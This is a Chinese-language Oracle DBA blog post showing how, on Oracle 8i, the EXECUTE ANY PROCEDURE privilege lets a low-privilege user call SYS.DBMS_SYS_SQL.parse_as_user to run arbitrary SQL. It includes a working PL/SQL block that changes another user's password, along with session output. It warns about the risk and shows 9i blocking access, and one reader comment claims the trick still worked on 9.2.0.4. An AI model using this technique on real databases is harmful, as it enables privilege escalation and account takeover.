eygle.com   eygle.com
eygle.com eygle
eygle.com  
 

« What's mean ORA-25191? | Blog首页 | 楠溪江之美 »

Why "EXECUTE ANY PROCEDURE" is a dangerous PRIVILEGE?

TOM曾经多次说过:
All I need is "CREATE SESSION" and "EXECUTE ANY PROCEDURE" and 
I can totally do anything I want to in your database.
那么这个EXECUTE ANY PROCEDURE的危险来自哪里呢?
让我们通过一个例子来认识这个危险.
1.创建测试用户
$ sqlplus "/ as sysdba"

SQL*Plus: Release 8.1.7.0.0 - Production on Tue May 10 09:57:41 2005

(c) Copyright 2000 Oracle Corporation.  All rights reserved.


Connected to:
Oracle8i Enterprise Edition Release 8.1.7.4.0 - 64bit Production
With the Partitioning option
JServer Release 8.1.7.4.0 - 64bit Production

SQL> create user hacker identified by hacker default tablespace users temporary  
  2  tablespace temp;

User created.

SQL> grant create session to hacker;

Grant succeeded.

SQL> grant execute any procedure to hacker;

Grant succeeded.

SQL> create user loser identified by loser default tablespace users temporary
  2  tablespace temp;

User created.

SQL> grant connect to loser;

Grant succeeded.


2.使用测试用户连接
注意,此时用户hacker具有了访问和执行dbms_sys_sql包的权限。
SQL> connect hacker/hacker
Connected.
SQL> desc sys.dbms_sys_sql
PROCEDURE BIND_ARRAY
 Argument Name                  Type                    In/Out Default?
 ------------------------------ ----------------------- ------ --------
 C                              NUMBER(38)              IN
 NAME                           VARCHAR2                IN
 N_TAB                          TABLE OF NUMBER         IN
PROCEDURE BIND_ARRAY
 Argument Name                  Type                    In/Out Default?
 ------------------------------ ----------------------- ------ --------
 C                              NUMBER(38)              IN
 NAME                           VARCHAR2                IN
 C_TAB                          TABLE OF VARCHAR2(2000) IN
....
PROCEDURE VARIABLE_VALUE_ROWID
 Argument Name                  Type                    In/Out Default?
 ------------------------------ ----------------------- ------ --------
 C                              NUMBER(38)              IN
 NAME                           VARCHAR2                IN
 VALUE                          ROWID                   OUT


3.这意味着什么?

SQL> connect hacker/hacker
Connected.

SQL> DECLARE
  2     UID       NUMBER;
  3     sqltext   VARCHAR2 (100) := 'alter user loser identified by test';
  4     c         INTEGER;
  5  BEGIN
  6     c := SYS.DBMS_SYS_SQL.open_cursor ();
  7     SYS.DBMS_SYS_SQL.parse_as_user (c, sqltext, DBMS_SQL.native, 0);
  8     SYS.DBMS_SYS_SQL.close_cursor (c);
  9      END;
 10  /
  
PL/SQL procedure successfully completed.

通过DBMS_SYS_SQL.parse_as_user,hacker可以在数据库内任意为非作歹了。
用户loser的口令已被更改:
SQL> connect loser/loser
ERROR:
ORA-01017: invalid username/password; logon denied


Warning: You are no longer connected to ORACLE.
SQL> connect loser/test
Connected.

SQL> 

4.注意版本
实际上这个bug只存在于Oracle8i中,从Oracle9i开始,即使拥有了execute any procedure的权限也不足以访问DBMS_SYS_SQL.
SQL> grant execute any procedure to test;

Grant succeeded.

Elapsed: 00:00:00.33
SQL> connect test/test
Connected.
SQL> desc dbms_sys_sql
ERROR:
ORA-04043: object dbms_sys_sql does not exist


SQL> desc sys.dbms_sys_sql
ERROR:
ORA-04043: object sys.dbms_sys_sql does not exist


SQL> select * from v$version;

BANNER
----------------------------------------------------------------
Oracle9i Enterprise Edition Release 9.2.0.4.0 - Production
PL/SQL Release 9.2.0.4.0 - Production
CORE    9.2.0.3.0       Production
TNS for Linux: Version 9.2.0.4.0 - Production
NLSRTL Version 9.2.0.4.0 - Production

Elapsed: 00:00:00.32

Oracle的世界也正在变得更加安全。

历史上的今天...
    >> 2012-05-10文章:
    >> 2010-05-10文章:
    >> 2007-05-10文章:

无觅

By eygle on 2005-05-10 10:19 | Comments (3) | SQL.PLSQL | 281 |

3 Comments

不错。ANY系统权限一定要慎重。如果拥有了EXECUTE ANY PROCEDURE和CREATE ANY PROCEDURE也就意味着拥有所有的权限。

实际上有了EXECUTE ANY PROCEDURE权限就够了,CREATE ANY PROCEDURE的权限可以自行获得。

当然是指Oracle8i中。

实际上这个bug只存在于Oracle8i中,从Oracle9i开始,即使拥有了execute any procedure的权限也不足以访问DBMS_SYS_SQL?
大师,没想到我现在研究的问题,您在一年前就已作过了,哈,真强,可我这有点不太明白,我现在在这里试验环境是 Oracle 9.2.0.4 |+linux 可是,按照您的做法,可以处跟你同样的结果,那为何还要说,--不足以访问???再就是,还有别的关于any 权限的实验吗,哈,有点贪了,主要比较感兴趣,哈,谢谢。期待您的E-mail.


CopyRight © 2004~2020 云和恩墨,成就未来!, All rights reserved.
数据恢复·紧急救援·性能优化 云和恩墨 24x7 热线电话:400-600-8755 业务咨询:010-59007017-7040 or 7037 业务合作: marketing@enmotech.com